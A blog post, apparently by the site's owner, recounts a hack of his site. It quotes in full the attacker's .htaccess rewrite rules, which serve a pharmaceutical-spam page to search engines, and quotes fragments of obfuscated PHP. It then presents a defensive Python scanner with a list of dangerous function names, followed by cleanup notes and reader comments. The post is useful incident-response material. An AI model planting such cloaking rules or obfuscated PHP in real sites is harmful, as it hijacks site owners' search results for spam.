It’s just data

Hacked

This site was hacked.  A reader of the site noted that Google’s index of this site had been co-opted by dubious pharmaceutical offerings.  I’ll gladly thank that individual publicly if they give me permission to do so; but my email reply got bounced as spam.

The immediate culprit was the addition of the following lines to a number of .htaccess files:

<IfModule mod_rewrite.c>
RewriteEngine On
# Conditions group as: (crawler UA OR search referer) AND (directory OR page) AND (not the payload)
# Request comes from a Google/Yahoo crawler, or from a visitor who arrived via a search engine ...
RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo)
# ... for a directory index or any .html/.htm/.php page ...
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (html|htm|php)$ [NC]
# ... but not for the payload itself, which would otherwise loop
RewriteCond %{REQUEST_FILENAME} !common.php
# Serve the attacker's common.php in place of the real content (search-engine cloaking)
RewriteRule ^.*$    /common.php [L]
</IfModule>

I removed those lines, as well as the common.php file, and scanned any and all PHP files on my site.  I saw the addition of lines such as the following:

$FYAqxDo='p'.'r'. 'eg_repl'. 'ace';...
$IHxWfs=str_rot13('cert_ercynpr');...
$DcNZVHCi="eW6DLAlbeAki"^"...
$LYDmvYopCKSSSGcfCVNpsskU='ba'.'se64_'.'deco'.'de'...
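
The two indicators above (rewrite rules that fire only for crawlers or search-engine referers, and function names assembled at run time so that a grep for the literal name finds nothing) can be checked mechanically. The scanner below is an added example and is not code from the original post or from the site being described. Its DANGEROUS name list is an assumption, the sample .htaccess and PHP lines are constructed to mirror the fragments quoted above, and the XOR key in the PHP sample is made up so that the pair decodes to preg_replace.

```python
"""Added example: scan a web root for the two indicators quoted above:
.htaccess rules that only fire for search-engine user agents or referers
(cloaking), and PHP that assembles a dangerous function name at run time
(concatenation, str_rot13, XOR of two literals) so a plain grep misses it."""
import codecs
import re
import sys
from pathlib import Path

# Names an obfuscator usually hides (assumed list). preg_replace is included
# because of its /e modifier, which evaluates the replacement as PHP (< 7).
DANGEROUS = {"eval", "assert", "preg_replace", "base64_decode", "gzinflate",
             "gzuncompress", "create_function", "system", "shell_exec", "exec"}

SEARCH_ENGINE = re.compile(r"google|yahoo|aol|bing|msn", re.I)
COND = re.compile(r"RewriteCond\s+%\{(HTTP_USER_AGENT|HTTP_REFERER)\}\s+(\S+)", re.I)
RULE = re.compile(r"RewriteRule\s+\S+\s+(\S+)", re.I)


def find_htaccess_cloaking(text):
    """Return targets of RewriteRules gated on a search-engine UA or referer.
    RewriteConds apply only to the next RewriteRule, so the gate resets."""
    targets, gated = [], False
    for line in text.splitlines():
        line = line.strip()
        cond = COND.match(line)
        if cond and SEARCH_ENGINE.search(cond.group(2)):
            gated = True
            continue
        rule = RULE.match(line)
        if rule:
            if gated:
                targets.append(rule.group(1))
            gated = False
    return targets


SQ = r"'[^'\\]*'"                                       # PHP single-quoted literal
CONCAT = re.compile(SQ + r"(?:\s*\.\s*" + SQ + r")+")   # 'ba'.'se64_'.'deco'.'de'
ROT13 = re.compile(r"str_rot13\s*\(\s*'([^'\\]*)'\s*\)")
DQ = r'"((?:[^"\\]|\\.)*)"'                             # PHP double-quoted literal
XOR = re.compile(DQ + r"\s*\^\s*" + DQ)                 # "..."^"..."


def php_dq(literal):
    r"""Decode the escapes PHP honors inside double quotes that obfuscators
    rely on: \xHH, a doubled backslash and an escaped double quote."""
    return re.sub(r'\\x([0-9A-Fa-f]{1,2})|\\(["\\])',
                  lambda m: chr(int(m.group(1), 16)) if m.group(1) else m.group(2),
                  literal)


def find_php_obfuscation(text):
    """Return (technique, decoded_name) pairs for names built at run time."""
    findings = []
    for m in CONCAT.finditer(text):
        joined = "".join(re.findall(r"'([^'\\]*)'", m.group(0)))
        if joined in DANGEROUS:
            findings.append(("concat", joined))
    for m in ROT13.finditer(text):
        decoded = codecs.decode(m.group(1), "rot13")
        if decoded in DANGEROUS:
            findings.append(("rot13", decoded))
    for m in XOR.finditer(text):
        # PHP string XOR is byte-wise and truncates to the shorter operand;
        # two literals XORed together is suspicious whatever they decode to.
        a, b = php_dq(m.group(1)), php_dq(m.group(2))
        findings.append(("xor", "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))))
    return findings


def scan_tree(root):
    """Walk a web root; return {path: findings} for .htaccess and .php files."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.name == ".htaccess" and path.is_file():
            hits = [("cloak", t) for t in find_htaccess_cloaking(path.read_text(errors="replace"))]
        elif path.suffix == ".php" and path.is_file():
            hits = find_php_obfuscation(path.read_text(errors="replace"))
        else:
            continue
        if hits:
            report[str(path)] = hits
    return report


# Constructed samples modeled on the fragments in the post; the XOR key is
# made up so that the pair decodes to preg_replace.
SAMPLE_HTACCESS = """<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (html|htm|php)$ [NC]
RewriteCond %{REQUEST_FILENAME} !common.php
RewriteRule ^.*$    /common.php [L]
</IfModule>
"""
SAMPLE_PHP = r"""<?php
$FYAqxDo='p'.'r'. 'eg_repl'. 'ace';
$IHxWfs=str_rot13('cert_ercynpr');
$DcNZVHCi="eW6DLAlbeAki"^"\x15%S#\x133\x09\x12\x09 \x08\x0c";
$LYDmvYopCKSSSGcfCVNpsskU='ba'.'se64_'.'deco'.'de';
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:                      # python scan.py /path/to/webroot
        for path, hits in scan_tree(sys.argv[1]).items():
            print(path, hits)
    else:
        print(find_htaccess_cloaking(SAMPLE_HTACCESS), find_php_obfuscation(SAMPLE_PHP))
```

Run it with a web root as the argument for a per-file report, or with no argument to decode the constructed samples. The XOR branch reports every pair of XORed string literals regardless of what they decode to, because legitimate PHP almost never XORs two constants; the concatenation and rot13 branches only report results that land in DANGEROUS. This is a triage aid, not a parser: a name split across double-quoted literals or built from chr() calls slips past it, which is why diffing against a clean snapshot remains the authoritative check.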

I had old (vintage 2006) installations of PHP-openid-1.2.1 and PHP-yadis-1.0.2 that I am tentatively assuming were the ports of initial entry.

I also wiped my .ssh directory.  It had a private key that was generated for this site, presumably legitimate but unused by me, and now presumed compromised.  I never initiate sessions from this host, nor do I have any passwords saved there, so any damage caused was isolated.

I do daily backups of my site, which I keep for a week; as well as monthly backups that I basically keep forever.  In addition, as I recently migrated hosts, I have a hot backup.

The PHP hacks were done after I migrated but before March 1st.  The .htaccess hacks were done over a week ago, but after March 1st.

Over the next few days, I’ll be looking at diffs of different snapshots of my site contents to see if there is anything else I missed.


Another victim of the Dreamhost .htaccess hack attack: What is Traffic Theft? [official Dreamhost blog]
This was posted by Dreamhost five days before you migrated. Does that mean that they knew about the attacks and didn’t prevent them, not even for new customers? I’m a relatively happy Dreamhost customer, but sometimes I think they’re a bit too easy going.

Posted by anonymous at

From that article:

these attacks have almost universally been due to insecure website software running on the site in question

I have every reason to believe that this is true in my case.

Posted by Sam Ruby at

To Dreamhost’s credit, I recently was the victim of another type of hack, where every PHP file on my site was prepended with a base64 encoded exploit. I was able to automatically revert the changes thanks to having installed WordPress and Mediawiki with Subversion, but I had a handful of other files (e.g. WordPress theme files) that were not under version control. I alerted Dreamhost to the attack, and they ran a script that scanned all the files in my account, cleaned the still affected files, made backups of the files they cleaned, and generated a very comprehensive email with all the details of what they did, and what I needed to do. I have to say, I was impressed. Sam, feel free to contact support and request a security scan just to be sure.

As an interesting aside, in my case, when I decoded the exploit, I could tell that the code specifically did not want to load when the page was requested by a search bot. This seems counter-intuitive, except that when Google discovers a site serving up malware for a period of time, they’ll drop you from their index, which means no more page views for our malware-friends. Which is kind of brilliant. The old hacks were all about SEO and Google Juice. The new hacks are all about money: ads and malware.

Posted by Justin Watt at

Sam, you’re a hacker. The dopes who broke the security on your website and planted ads and malware don’t deserve the honorific “hacker,” they’re crackers.

Posted by Joann Empson at

Google sent me a Notice of Suspected Hacking on May 17th.  I sent back a Reconsideration Request.  It is amazing to me how quickly Google’s index of this site changed when it was hacked, and how slow it has been in the progress to restore the index to its original state.

Posted by Sam Ruby at
